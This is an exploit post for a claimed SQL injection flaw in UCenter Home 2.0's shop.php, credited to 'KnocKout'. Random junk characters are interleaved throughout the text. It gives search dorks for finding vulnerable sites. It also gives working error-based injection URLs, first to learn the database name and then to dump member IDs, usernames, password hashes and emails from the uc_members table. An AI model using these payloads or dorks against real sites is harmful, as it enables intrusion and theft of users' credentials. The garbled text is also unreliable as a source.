# ? f+ h! ]* G B8 `- M__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 7 Z7 C( w! `& E- I; Y
. L! B6 D6 W" I4 R ! U) H' r4 y3 R0 a9 p0 I
6 G6 P& b0 ~ N5 r2 @ ] _9 U7 Q! l*/ Author : KnocKout
; H. H, |0 p9 M4 I0 _ R, H# U3 u1 M x- ]# I0 I; h& T, c7 A3 g- b
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
% I, _% w" X, u. h5 ?/ \$ G) h, ^3 |$ i; A+ v
*/ Contact: knockoutr@msn.com |* t+ o8 f4 w, Z
5 R; _" `! |* _. L; s& y! a*/ Cyber-Warrior.org/CWKnocKout
$ P* k1 x3 V- Z* u5 q( r( O! D2 a3 t$ C5 z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== + W( }* l) H. f% \
C5 p( e( a$ P) p% h. N5 v
Script : UCenter Home 6 W0 O8 `& h0 G
, C) C0 |$ m) W* Y/ |- U4 u! `0 M/ b
Version : 2.0 6 \, p, v: L) Y/ N. K
# D. n2 X! q X& a8 W- Q
Script HomePage : http://u.discuz.net/ % P- j. l1 H# C! ]* d
0 Z: @3 V* m- S/ B h: @ B
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 9 s, Q! t) V+ h
' h% Y& E+ V6 ~$ \: [; wDork : Powered by UCenter inurl:shop.php?ac=view
9 x/ v; B d4 P2 U) j7 L+ N( x
% m; S: j2 E: P0 A+ ADork 2 : inurl:shop.php?ac=view&shopid=
' y; i7 `! P& [3 O* u$ g X( i5 o; m, v" z( R' f, a3 ?
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
4 q8 @+ s7 ~- L. b
/ Q1 \: H1 {/ E$ Z. X, c! K- F/ R" f2 }Vuln file : Shop.php
2 r5 u$ ]; x5 X1 k j& P, l y E% _. ]) H$ S# \5 a! {) J
value's : (?)ac=view&shopid=
& Y8 w+ h( `0 u* ?
" \% x. n4 p$ l' o4 ?5 P" m8 SVulnerable Style : SQL Injection (MySQL Error Based)
$ j6 c$ C# q9 M/ P; W; _# D. G4 C( W. Q' }" T8 E
Need Metarials : Hex Conversion
0 v/ X6 ^8 a& O& z- H5 ~# r7 F; a& h
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; ~$ C1 Z, a6 |% _( V( h7 B' S7 E' B6 l# e/ u* }$ p
Your Need victim Database name. 8 p) S/ K, H3 c! l# ?# M2 @/ x( m
5 P1 z3 R+ R/ ~+ l. E! yfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 & h0 u W3 j4 s" F* N
; Y/ \5 Y+ V3 `..
1 D/ x) W7 b. {* x! i2 c2 U# {) ^6 I* N. g% e
DB : Okey. 5 r1 a0 [4 N$ v/ s. s
- K; j: m' Q' x6 ?4 g7 l, J
your edit DB `[TARGET DB NAME]` 4 h ~# B. M3 O9 [6 B: y, @
( N/ m+ b: y. e/ @4 ^1 N
Example : 'hiwir1_ucenter'
# g* t- L5 T: p, @0 p( b
8 R4 q# d; H# T* I& c. gEdit : Okey.
4 L, o' }) Z, ^* X# s, i2 h
8 T# k$ T6 c" C0 [% iYour use Hex conversion. And edit Your SQL Injection Exploit.. 6 H" X S4 E. g2 g' e/ A
: h- a% p( B& K3 H' i2 |
7 p) n& d8 y" X: C* D4 R8 F
& M8 W) U) B/ f9 eExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
9 F( ?+ {- a4 @/ n |